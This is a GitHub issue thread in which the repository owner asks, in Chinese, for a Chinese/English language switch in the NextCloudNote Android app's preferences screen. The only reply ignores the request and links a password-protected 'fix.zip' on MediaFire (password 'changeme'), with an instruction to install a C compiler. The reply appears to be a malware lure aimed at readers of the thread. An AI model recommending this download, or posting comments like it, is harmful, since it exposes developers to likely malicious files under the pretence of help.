### ISSUE TITLE
[Enhancement]：加入中英文切换功能

### ISSUE THREAD

**Issue by sumikiru** [sumikiru/NextCloudNote#2]
### Is your feature request related to a problem? Please describe.

None.

### Describe the solution you'd like

在`PreferencesFragment.java`中加入新的`BrandedSwitchPreference`，命名为`switchLanguagePref`。
为`switchLanguagePref`添加监听事件，切换开关时实现中英文切换。
> 图片示例：
<img width="257" alt="idea64_lqN6VS8EFi" src="https://github.com/user-attachments/assets/353590fa-f7aa-427d-b69d-4726139aab01">

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)
